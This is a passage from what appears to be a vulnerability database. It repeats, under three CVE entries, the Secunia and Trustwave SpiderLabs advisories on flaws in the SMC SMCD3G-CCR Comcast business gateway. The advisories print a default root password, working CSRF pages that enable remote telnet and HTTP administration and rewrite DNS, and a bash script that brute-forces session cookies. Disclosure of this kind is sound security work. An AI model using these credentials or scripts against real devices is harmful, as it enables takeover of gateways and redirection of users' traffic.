A vulnerability has been reported in Cisco Nexus 1000V, which can be
exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error when processing 802.1Q
tagged packets. This can be exploited to cause a crash when a virtual
machine sends a packet on a vEthernet port.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
Cisco (CSCtj17451):
http://www.cisco.com/en/US/docs/switches/datacenter/nexus1000/sw/4_0_4_s_v_1_3_c/release/notes/n1000v_rn.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201102-0084 | CVE-2011-0886 | SMC SMCD3G-CCR of Web Cross-site request forgery vulnerability in the interface |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Multiple cross-site request forgery (CSRF) vulnerabilities in the web interface on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 allow remote attackers to (1) hijack the intranet connectivity of arbitrary users for requests that perform a login via goform/login, or hijack the authentication of administrators for requests that (2) enable external logins via an mso_remote_enable action to goform/RemoteRange or (3) change DNS settings via a manual_dns_enable action to goform/Basic. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0085 | CVE-2011-0887 | SMC SMCD3G-CCR of Web Management portal Vulnerable to session hijacking |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The web management portal on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 uses predictable session IDs based on time values, which makes it easier for remote attackers to hijack sessions via a brute-force attack on the userid cookie. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform"
action="http://10.1.10.1/goform/Basic" method="post"> <input
type="hidden" value="feat-wan-ip" name="file"> <input
type="hidden" value="admin/" name="dir"> <input
type="hidden" value="Fixed" name="DNSAssign"> <input
type="hidden" value="0" name="dhcpc_release"> <input
type="hidden" value="0" name="dhcpc_renew"> <input
type="hidden" value="" name="domain_name"> <input
type="hidden" value="" name="WDn"> <input type="hidden"
name="SysName" value="" /> <input type="hidden"
name="manual_dns_enable" value="on" /> <input type="hidden"
name="DAddr" value="4.2.2.1" /> <input type="hidden"
name="DAddr0" value="4" /> <input type="hidden"
name="DAddr1" value="2" /> <input type="hidden"
name="DAddr2" value="2" /> <input type="hidden"
name="DAddr3" value="1" /> <input type="hidden"
name="PDAddr" value="4.2.2.2" /> <input type="hidden"
name="PDAddr0" value="4" /> <input type="hidden"
name="PDAddr1" value="2" /> <input type="hidden"
name="PDAddr2" value="2" /> <input type="hidden"
name="PDAddr3" value="2" /> </form> <script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC was embedded in any web page the targeted user visited while
logged into the device, the attacker would be provided remote
administration in to the gateway device include a telnet shell. This would
allow the attacker to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast utilize a predictable value to
validate the active web management portal session. The epoch time of
beginning of the session is stored as a cookie labeled "userid". This
provides a predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute force the session IDs by requesting the
admin page with an incrementing cookie and determining whether it wants to
redirect to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions do by default expire within 10 minutes, thus the attack window is
limited but can be leveraged with other attack methods.
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0083 | CVE-2011-0885 | SMC SMCD3G-CCR of specific Comcast Business Gateway Vulnerabilities that gain management access in settings |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
A certain Comcast Business Gateway configuration of the SMC SMCD3G-CCR with firmware before 1.4.0.49.2 has a default password of D0nt4g3tme for the mso account, which makes it easier for remote attackers to obtain administrative access via the (1) web interface or (2) TELNET interface. Comcast DOCSIS is prone to multiple cross-site request-forgery and security-bypass vulnerabilities in business gateways.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, bypass certain security restrictions, gain unauthorized access to the affected device, or delete certain data. Other attacks are also possible.
Comcast DOCSIS 3.0 is vulnerable; other versions may also be affected. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
SMC SMCD3G-CCR Two Vulnerabilities
SECUNIA ADVISORY ID:
SA43199
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43199/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
RELEASE DATE:
2011-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/43199/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43199/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43199
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Two vulnerabilities have been reported in SMC SMCD3G-CCR, which can
be exploited by malicious people to conduct brute force and
cross-site request forgery attacks.
1) The web management application generates session identifiers
incrementally, which can be exploited to brute force a valid session
identifier via the "userid" cookie.
2) The web management application allows users to perform certain
actions via HTTP requests without making proper validity checks to
verify the requests. This can be exploited to e.g. enable management
via Telnet by tricking an administrator into visiting a malicious web
site while being logged-in to the application.
SOLUTION:
Reportedly fixed in firmware version 1.4.0.49.2.
PROVIDED AND/OR DISCOVERED BY:
Zack Fasel and Matthew Jakubowski, Trustwave's SpiderLabs.
ORIGINAL ADVISORY:
Trustwave's SpiderLabs (TWSL2011-002):
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. Trustwave's SpiderLabs Security Advisory TWSL2011-001:
Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways
(SMCD3G-CCR)
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt
Published: 2011-02-04
Version: 1.0
Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com)
Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR
Version affected: Versions prior to 1.4.0.49.2
Product description:
The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of
cable internet services for Comcast Business Class customers with enhanced
services including Network Address Translation (NAT), firewalling, and
Virtual Private Network (VPN) termination.
Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs
Finding 1: Static Credentials
CVE: CVE-2011-0885
All SMCD3G-CCR gateways provided by Comcast have an administrative
login of "mso" with the password of "D0nt4g3tme". These passwords
are not provided as a part of the installation of the device and are
not recommended to be changed, thus the majority of users are unaware
of the default configuration.
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against
numerous management pages allowing an attacker to embed in a webpage a
malicious request against the gateway's management interface. Through
this, an attacker can modify device configuration and enable remote
administration via a telnet shell and http.
The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
